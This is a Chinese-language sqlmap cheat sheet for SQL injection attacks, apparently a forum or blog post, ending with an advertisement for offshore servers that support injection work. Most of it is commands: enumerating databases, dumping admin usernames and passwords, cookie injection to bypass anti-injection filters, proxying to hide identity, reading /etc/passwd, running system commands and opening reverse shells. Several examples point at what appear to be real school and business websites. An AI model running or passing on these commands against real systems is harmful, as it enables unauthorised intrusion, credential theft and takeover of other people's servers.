检查注入点
sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"
列数据库信息
sqlmap -u "http://www.scshlx.com/TeachView.asp?id=21" --dbs
指定库名列出所有表 //最大搜索线程为10
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables
指定库名表名列出所有字段
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" -T "双引号下为指定表名admin" --columns
指定库名表名字段名dump出指定字段的内容
sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password"
查询表名下所有字段
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columns
Mysql注入(有多个库 必须找到有管理员的数据库)
--is-dba 当前用户权限
--dbs 所有数据库
--current-db 网站当前数据库
--users 所有数据库用户
--current-user 当前数据库用户
--tables-D"当前数据库名字" 查表名、
-T"指定的表名"-D"当前数据库名字"--columns 查字段
Cookie注入(遇到防注入)
sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2
列表名等 在上方代码后面加--tables等;
eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username"
有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:
–cookie=COOKIE在需要登录的地方,需要登录后的cookie
–proxy=”http://127.0.0.1:8087″ 使用HTTP代理隐藏自己的身份,比如使用goagent等
–sql-query=QUERY 执行一个sql语句,不一定支持
sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定数 据库类型
sqlmap -u “http://url/news?id=1″ -- users 列数据库用户
sqlmap -u “http://url/news?id=1″ -- dbs 列数据库
sqlmap -u “http://url/news?id=1″ -- passwords 数据库用户密码
sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定用户 数据库密码
sqlmap -u “http://url/news?id=1″ -- dump -C “password,user,id” -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定字段,列出20 条
sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有数据库所有表
sqlmap -u “http://url/news?id=1″ -- privileges #查看权限
sqlmap -u “http://url/news?id=1″ -- privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
sqlmap -u “http://url/news?id=1″ -- udf-inject #导入用户自定义函数(获取 系统权限!)
sqlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u “http://url/news?id=1″ -- union-cols #union 查询表记录
sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news?id=1″ -- b #获取banner信息
sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入
sqlmap -u “http://url/news?id=1″ - v 1 -f #指纹判别数据库类型
sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入
sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定关键词
sqlmap -u “http://url/news?id=1″ -- sql-shell #执行指定sql命令
sqlmap -u “http://url/news?id=1″ -- file /etc/passwd
sqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #执行系统命令
sqlmap -u “http://url/news?id=1″ -- os-shell #系统交互shell
sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
sqlmap -u “http://url/news?id=1″ -- reg-read #读取win系统注册表
sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#保存进度
sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢复 已保存进度
USA-IDC海外服务器支持sqlmap post注入,欢迎广大用户联系24小时在线客服租用